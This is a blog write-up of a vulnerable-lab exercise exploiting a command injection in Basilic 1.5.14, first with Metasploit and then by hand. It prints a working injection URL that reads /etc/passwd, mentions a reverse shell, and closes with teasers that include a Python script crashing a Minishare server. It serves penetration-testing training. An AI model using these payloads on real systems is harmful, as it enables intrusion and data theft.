Pentester Academy Command Injection ISO basilic 1.5.14 exploit



This writeup is published on infosecinstitute.

         Pentester academy has launched a Command Injection ISO virtual image of Ubuntu with lots of real world vulnerable application framework.

Refer the following link for download and information purpose:
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12

Lab setup:
1) Kali linux (Bridged or NAT) . My Kali Linux Ip was 192.168.1.102
2) Command Injection ISO (Bridged or NAT). My target IP was 192.168.1.103

Login into command injection ISO with user name securitytube and password 123321 to check for the DHCP ip address allocated or simply do a ping scan (nmap -sn)

Checking out for port 80 on Command Injection ISO (192.168.1.103)



As seen above there are many framework installed for exploitation. I will be working with Basilic 1.5.14 in this blog.

Click on the basilic folder and you can see the following.



     Searching for exploit in exploit-db with searchsploit tool in Kali gave me a ruby exploit.



If the language is ruby then I guess it will be present in metasploit.
Searching for exploit in msf framework.


Configure metasploit as shown below:


Finally Exploit:


We have successfully exploited command injection vulnerability in basilic and got www-data privilege on the target.

Now lets us exploit it without metasploit.

Searching for exploit on internet I found the following URl http://www.securityfocus.com/bid/54234/exploit
 




http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Due to output encoding of SecurityFocus  it seems to be obfuscated. Actual exploit is as follows.

http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2
  Using the above mentioned exploit for command execution.


We are able to execute system command using file parameter.
Let's get a reverse shell.


Got the Shell.





Comments

Post a Comment

Popular posts from this blog

MY OSCP REVIEW

Image
MY OSCP REVIEW About me I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai. Inspiration to do OSCP Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security. And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less. So I asked few question on some group in facebook regarding How can I learn more exploitation stuff. There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I
Read more

Minishare 1.4.1 Bufferoverflow

Image
You can download the server from: https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0 Exploit code in ruby: https://www.exploit-db.com/exploits/616/ The vulnerability is a long URL in the GET request. Eg:- GET AAAAAAAAAAAAAAAA..... HTTP/1.1 Lab Setup: 1) Windows xp ( I am using windows xp sp1) 2) Immunity debugger installed on the windows xp machine. 3) Minishare 1.4.1 installed on windows xp running on port 80. 2) Kali linux for scripting and exploiting. Configure the victim: I have installed Minishare server 1.4.1 and it is listening for connections on port 80, as depicted below. Generate Sample script to crash: We will try to smash the stack by sending a buffer of 2000 A's with the help of the following script. #!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*2000 buff+=" HTTP/1.1\r\n\r\n" s.send(buff) s.close
Read more